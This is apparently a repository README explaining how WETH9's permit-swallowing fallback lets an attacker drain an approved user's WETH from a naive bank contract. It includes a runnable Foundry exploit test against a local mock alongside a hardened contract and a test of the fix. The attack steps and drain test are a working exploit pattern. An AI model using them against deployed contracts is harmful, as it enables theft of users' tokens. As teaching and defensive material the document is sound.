wezzcoetzee/weth-permit-exploit
WETH permit exploit

Many ERC20 tokens implement EIP-2612 permit, but WETH (WETH9) does not. WETH9's fallback function is payable and simply calls deposit(), so a call to permit() with any arguments, including an empty signature, lands in the fallback and returns without reverting. A contract that calls permit() and treats a non-reverting return as proof of a valid signature can be tricked into spending an allowance the token owner had already granted.

What is the exploit?

  1. Victim gives ERC20Bank.sol an infinite approval to spend their WETH.
  2. Victim calls deposit and deposits 1 WETH into ERC20Bank. The rest of the victim's WETH stays in their wallet, still covered by the infinite approval.
  3. Attacker calls depositWithPermit, naming the victim as the owner and passing an empty signature. The permit call hits WETH's fallback and returns normally, so ERC20Bank proceeds to transferFrom the victim's entire WETH balance into itself using the existing approval and credits the amount to the attacker's deposit.
  4. Attacker calls withdraw and receives the victim's WETH.
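The four steps above as a runnable Foundry test, followed by a hardened form of the bank. This is an added example, not the repository's ERC20Bank.sol or its test suite; MockWETH9, VulnerableBank, SafeBank, ExploitTest and the `deposits` mapping are assumed names. MockWETH9 reproduces only the WETH9 behaviour that matters here: there is no permit(), so the call falls into the payable fallback, which runs deposit() and returns normally.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Added example, not the repository's ERC20Bank.sol or tests. The names MockWETH9,
// VulnerableBank, SafeBank, ExploitTest and `deposits` are assumptions for this file.
import {Test} from "forge-std/Test.sol";

interface IERC20Permit {
    function permit(address owner, address spender, uint256 value, uint256 deadline,
                    uint8 v, bytes32 r, bytes32 s) external;
    function nonces(address owner) external view returns (uint256);
}

// Stand-in for WETH9: no permit(), but any unknown selector lands in the payable
// fallback, which just runs deposit(), so permit(...) never reverts.
contract MockWETH9 {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    function deposit() public payable { balanceOf[msg.sender] += msg.value; }
    fallback() external payable { deposit(); }
    function approve(address guy, uint256 wad) external returns (bool) { allowance[msg.sender][guy] = wad; return true; }
    function transfer(address dst, uint256 wad) external returns (bool) { return transferFrom(msg.sender, dst, wad); }
    function transferFrom(address src, address dst, uint256 wad) public returns (bool) {
        require(balanceOf[src] >= wad, "balance");
        if (src != msg.sender) {
            require(allowance[src][msg.sender] >= wad, "allowance");
            allowance[src][msg.sender] -= wad;
        }
        balanceOf[src] -= wad;
        balanceOf[dst] += wad;
        return true;
    }
}

contract VulnerableBank {
    MockWETH9 public immutable weth;
    mapping(address => uint256) public deposits;
    constructor(MockWETH9 _weth) { weth = _weth; }
    function deposit(uint256 amount) external {
        weth.transferFrom(msg.sender, address(this), amount);
        deposits[msg.sender] += amount;
    }
    // Bug: assumes permit() reverts on a bad signature, then credits msg.sender rather
    // than `owner`, so anyone can spend an allowance that `owner` already granted.
    function depositWithPermit(address owner, uint256 amount, uint256 deadline,
                               uint8 v, bytes32 r, bytes32 s) external virtual {
        IERC20Permit(address(weth)).permit(owner, address(this), amount, deadline, v, r, s);
        weth.transferFrom(owner, address(this), amount);
        deposits[msg.sender] += amount;
    }
    function withdraw(uint256 amount) external {
        deposits[msg.sender] -= amount;
        weth.transfer(msg.sender, amount);
    }
}

// Hardened form: demand proof that permit() was consumed (the owner's nonce advances;
// on WETH9 nonces() itself reverts because the fallback writes storage) and credit owner.
contract SafeBank is VulnerableBank {
    constructor(MockWETH9 _weth) VulnerableBank(_weth) {}
    function depositWithPermit(address owner, uint256 amount, uint256 deadline,
                               uint8 v, bytes32 r, bytes32 s) external override {
        IERC20Permit p = IERC20Permit(address(weth));
        uint256 nonceBefore = p.nonces(owner);
        p.permit(owner, address(this), amount, deadline, v, r, s);
        require(p.nonces(owner) == nonceBefore + 1, "permit not consumed");
        weth.transferFrom(owner, address(this), amount);
        deposits[owner] += amount;
    }
}

contract ExploitTest is Test {
    MockWETH9 weth;
    VulnerableBank bank;
    address victim = makeAddr("victim");
    address attacker = makeAddr("attacker");
    function setUp() public {
        weth = new MockWETH9();
        bank = new VulnerableBank(weth);
        vm.deal(victim, 10 ether);
        vm.startPrank(victim);
        weth.deposit{value: 10 ether}();
        weth.approve(address(bank), type(uint256).max); // step 1: infinite approval
        bank.deposit(1 ether);                           // step 2: deposit 1 WETH
        vm.stopPrank();
    }
    function testDrainVictim() public {
        uint256 loot = weth.balanceOf(victim);           // 9 WETH still in the wallet
        vm.startPrank(attacker);
        bank.depositWithPermit(victim, loot, 0, 0, bytes32(0), bytes32(0)); // step 3
        bank.withdraw(loot);                                                // step 4
        vm.stopPrank();
        assertEq(weth.balanceOf(attacker), loot);
        assertEq(weth.balanceOf(victim), 0);
    }
    function testSafeBankRejectsEmptySignature() public {
        SafeBank safe = new SafeBank(weth);
        vm.expectRevert();
        vm.prank(attacker);
        safe.depositWithPermit(victim, 1 ether, 0, 0, bytes32(0), bytes32(0));
    }
}
```

Drop the file under test/ in a Foundry project with forge-std installed and run forge test -vvv. testDrainVictim passes against VulnerableBank because the empty-signature permit() call is swallowed by the fallback. SafeBank reverts at the first nonces() read, since WETH9's fallback tries to write storage inside a staticcall. Crediting `owner` instead of msg.sender on its own stops the theft but still lets anyone move an approved user's WETH into the bank; requiring the nonce to advance closes that path as well.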

Instructions

  1. Install Foundry with foundryup.
  2. Run `forge install foundry-rs/forge-std` in the project directory to install the dependencies.
  3. Run `forge build` to compile the contracts.
  4. Run `forge test -vvv` to execute the tests.
